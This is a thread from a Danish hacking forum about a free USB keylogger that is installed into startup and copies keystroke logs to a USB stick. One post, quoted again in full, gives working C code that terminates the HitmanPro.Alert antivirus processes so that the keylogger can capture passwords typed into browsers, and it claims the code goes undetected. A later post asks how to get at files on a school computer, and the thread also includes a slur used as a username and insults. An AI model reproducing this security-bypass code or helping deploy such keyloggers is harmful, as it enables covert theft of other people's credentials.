Shellsec

Shellsec > Hacking > Infektion > Vejledninger > !Free USB Keylogger!
Fuld version: !Free USB Keylogger!
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.
Sider: 1 2 3

showbizz

20-01-2018, 13:29
Nej, den kan ikke registrere de sidste 3 bogstaver i alfabetet.

Kunne ikke forstå, at alle mine keystrokes var krypteret, indtil det slog mig, at jeg bruger HMP.alert - det krypterer keystrokes :)

Dr. Doom

11-02-2018, 00:03
(20-01-2018, 13:29)showbizz Skrev: [ -> ]Nej, den kan ikke registrere de sidste 3 bogstaver i alfabetet.

Kunne ikke forstå, at alle mine keystrokes var krypteret, indtil det slog mig, at jeg bruger HMP.alert - det krypterer keystrokes :)

Jeg tog et kig på den antivirus som du bruger (HitmanPro.Alert) og den krypterer kun keystrokes indtastet i specifikke programmer såsom browsere. De ting du indtaster i fx notepad, din password manager eller når du forbinder til trådløse netværk bliver ikke krypteret og opfanges fint af keyloggeren. Antivirus processen kører desuden som uprivilegeret bruger og kan uden videre slås ihjel af ondsindede programmer. Følgende kode kan derfor tilføjes til keyloggeren og bruges som bypass, så dine passwords bliver opfanget i browseren alligevel:

Kode:
#include "stdafx.h"
#include <windows.h>
#include <process.h>
#include <Tlhelp32.h>
#include <winbase.h>
#include <string.h>

void killProcessByName(const WCHAR *filename)
{
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize = sizeof(pEntry);
    BOOL hRes = Process32First(hSnapShot, &pEntry);
    while (hRes)
    {
        if (wcscmp(pEntry.szExeFile, filename) == 0)
        {
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
                (DWORD)pEntry.th32ProcessID);
            if (hProcess != NULL)
            {
                TerminateProcess(hProcess, 9);
                CloseHandle(hProcess);
            }
        }
        hRes = Process32Next(hSnapShot, &pEntry);
    }
    CloseHandle(hSnapShot);
}
int main()
{
    killProcessByName(L"hmpalert.exe");
    killProcessByName(L"hmpalertsvc");
    return 0;
}

Hverken keylogger eller ovenstående kode bliver detekteret som ondsindet af HitmanPro.Alert.

TheHacker

12-02-2018, 21:09
(11-02-2018, 00:03)Dr. Doom Skrev: [ -> ]Jeg tog et kig på den antivirus som du bruger (HitmanPro.Alert) og den krypterer kun keystrokes indtastet i specifikke programmer såsom browsere. De ting du indtaster i fx notepad, din password manager eller når du forbinder til trådløse netværk bliver ikke krypteret og opfanges fint af keyloggeren. Antivirus processen kører desuden som uprivilegeret bruger og kan uden videre slås ihjel af ondsindede programmer. Følgende kode kan derfor tilføjes til keyloggeren og bruges som bypass, så dine passwords bliver opfanget i browseren alligevel:

Kode:
#include "stdafx.h"
#include <windows.h>
#include <process.h>
#include <Tlhelp32.h>
#include <winbase.h>
#include <string.h>

void killProcessByName(const WCHAR *filename)
{
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize = sizeof(pEntry);
    BOOL hRes = Process32First(hSnapShot, &pEntry);
    while (hRes)
    {
        if (wcscmp(pEntry.szExeFile, filename) == 0)
        {
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
                (DWORD)pEntry.th32ProcessID);
            if (hProcess != NULL)
            {
                TerminateProcess(hProcess, 9);
                CloseHandle(hProcess);
            }
        }
        hRes = Process32Next(hSnapShot, &pEntry);
    }
    CloseHandle(hSnapShot);
}
int main()
{
    killProcessByName(L"hmpalert.exe");
    killProcessByName(L"hmpalertsvc");
    return 0;
}

Hverken keylogger eller ovenstående kode bliver detekteret som ondsindet af HitmanPro.Alert.
Gyldent svar Love
Du har fået +rep fra mig :)

NiqqasErSorte

26-04-2018, 18:25
(31-10-2017, 10:00)UnKnoWn Skrev: [ -> ]!USB Keylogger!

Hej bois, jeg faldt lige over den her tråd på hackforums omkring en meget sjov usb keylogger og tænkte jeg ville dele den med jer.
Jeg er ikke sikker på om noget lignende ligger herinde, hvis det er tilfældet så vil jeg gerne slette tråden igen :) 


KLog (kræver fysisk adgang til systemet)

Install.bat: smider Winhost.exe(Keyloggeren) i startup så den automatisk bliver eksekveret.

Uninstall.bat: fjerner Winhost.exe processen og sletter den fra startup.
Getlog.bat: smider logfilen fra computeren ind på usb stikket

Clear.bat: rydder loggen på computeren(ikke på usb stikket)

Install.bat lukker ikke cmd boksen automatisk, det skal gøres manuelt.
Alle andre bat filer lukker selv når de er færdige 

Jeg har ikke lavet den eller opslaget, jeg fandt den på Hackforums fra en gut ved navn Pronouncer så fuld kreds til ham. 
har dog prøvet at oversætte den til dansk så godt jeg kunne. 


Link til KLog

TheHacker tør du og hack fight imod mig? Ville væde jeg kunne tæve en lille lort som dig da spiller smart på et lorte dansk forum.

Hund

27-04-2018, 00:27
(26-04-2018, 18:25)NiqqasErSorte Skrev: [ -> ]TheHacker tør du og hack fight imod mig? Ville væde jeg kunne tæve en lille lort som dig da spiller smart på et lorte dansk forum.
haha, okay du. :P

TheHacker

27-04-2018, 13:49
(26-04-2018, 18:25)NiqqasErSorte Skrev: [ -> ]TheHacker tør du og hack fight imod mig? Ville væde jeg kunne tæve en lille lort som dig da spiller smart på et lorte dansk forum.

Nånånånånå, der fik man dagens grin Pacman

sido

16-05-2019, 20:40
Hvordan kan man få adgang til filer som er i en skole pc. det skal siges jeg kunne side i lokalet ?
Sider: 1 2 3
Shellsec > Hacking > Infektion > Vejledninger > !Free USB Keylogger!